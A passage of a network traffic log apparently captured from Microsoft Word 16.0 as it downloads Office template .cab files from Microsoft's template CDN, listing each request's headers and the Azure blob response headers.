Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
ETag: 0x8D36AC8813CE0D3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4196af4e-901e-003f-4990-2d48e6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp02851217.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 33610
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: UYBOJVxXMXYDn01bVcEqsg==
Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
ETag: 0x8D36AC881987151
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0171b447-f01e-005b-359a-1db97e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp02851220.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31482
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 8Q35ApgPHVvuqWssZoQIpw==
Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
ETag: 0x8D36AC8827914A7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6af291c5-801e-0036-306e-a9075a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp02851219.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31605
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ae2zv4HJn+ipS7oDQIxa4Q==
Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
ETag: 0x8D36AC8822FFB6E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d1eac4bf-d01e-0092-5897-a00efc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp0403392701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 2527736
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 8laspQm0xsAUTSeMcDawqA==
Last-Modified: Wed, 29 Aug 2018 18:18:47 GMT
ETag: 0x8D60DDBDD02F94A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0e86dec0-501e-00d1-55b9-b9e8a0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp02851218.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31835
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: kqgZ1DSoquosZfDMLzO7Og==
Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
ETag: 0x8D36AC881E66CE5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7ac92116-501e-008c-3524-b9e224000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp02851221.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31562
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: HW+Oc6BmKkjTMgkKTIyJjw==
Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
ETag: 0x8D36AC882C4ED43
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e4f000bb-501e-0148-0297-a06910000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp02851223.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 32833
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IFr1FgTvlu8ejmAhJUH3Qg==
Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
ETag: 0x8D36AC88357BC32
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1e858e71-b01e-0028-5118-2de1ed000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp02851224.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 30957
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 08kDbk4RWegysbTS6dQr8A==
Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
ETag: 0x8D36AC883A171B7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7a3535a8-301e-0103-55f4-b69543000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp0309043001.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 307348
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: DrxFqg5nzENdB0VDg3H5SA==
Last-Modified: Wed, 29 Aug 2018 18:20:24 GMT
ETag: 0x8D60DDC169CBCB0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2c019ff3-801e-0113-0868-144bdd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp02851227.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31471
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: karb7EFxz6gpK2GEkvXvNA==
Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
ETag: 0x8D36AC8848A0495
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c81084a1-301e-0023-0625-b910e9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp0309043402.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 723359
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: dIpTxr3Vzpe9VKdsejNChg==
Last-Modified: Wed, 29 Aug 2018 18:14:30 GMT
ETag: 0x8D60DDB43B59EC5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b73fb8ce-601e-005c-4e97-a0df72000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp02851222.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 28911
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: bXh7HiI9trkbaSOAYsyocg==
Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
ETag: 0x8D36AC8830E54C8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2bee5db1-501e-00ee-2682-b92003000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp03328884.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 22008
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: q78QzulIDkHYEnfpU4+Yyw==
Last-Modified: Fri, 22 Apr 2016 16:10:17 GMT
ETag: 0x8D36AC8987823BE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6f8d419e-401e-005e-2951-556ba5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp02851226.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 35519
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: U+6dpJ0LhDVwOOzzdoONLg==
Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
ETag: 0x8D36AC88440C433
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 19a4e9a0-101e-0104-7797-a0f920000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp02851225.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31008
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4DPMvHunh6L4JM4JUuV9RA==
Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
ETag: 0x8D36AC883F49D7D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b3f59ba9-f01e-00aa-4597-a0aa3c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp03328916.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 26944
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: +RPdhJFXUwQthWzsTl2rpQ==
Last-Modified: Fri, 22 Apr 2016 16:09:47 GMT
ETag: 0x8D36AC886C4C4EE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 52f19976-401e-0071-3caf-51666e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp03328919.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 22149
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ZsUZnPT7GL1Pnz8sywdABw==
Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
ETag: 0x8D36AC8871139C3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bd32d8ea-801e-0033-2376-14dfee000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp03328925.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 25314
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: xH40MK+BPfiwLhy0gp3ZSw==
Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
ETag: 0x8D36AC8875AEF5A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 77d2d97b-f01e-00d8-5fc1-a3ad73000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp03328932.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 20554
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: SGy8siO4cxMv+vS4rQrQRA==
Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
ETag: 0x8D36AC887A4CC19
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d2d83591-a01e-0046-5984-35b4c2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp03998159.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 3417042
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: dJw2FeVMjmh1UYz9hOWhsg==
Last-Modified: Fri, 22 Apr 2016 16:11:19 GMT
ETag: 0x8D36AC8BD7E1FE9
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c28a3f34-b01e-00c9-0497-a037c7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp03328935.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 23597
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: fGRexQWYL+Up0OUDWzeP/A==
Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
ETag: 0x8D36AC887EFBA2F
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 56e459b1-f01e-010c-2097-a0e32f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp0403391701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 698244
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4pziZjpWoUROqjcy/7gpQA==
Last-Modified: Wed, 29 Aug 2018 18:15:39 GMT
ETag: 0x8D60DDB6CAEA91D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e0e39ccb-e01e-0025-7098-042939000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

WINWORD.EXE

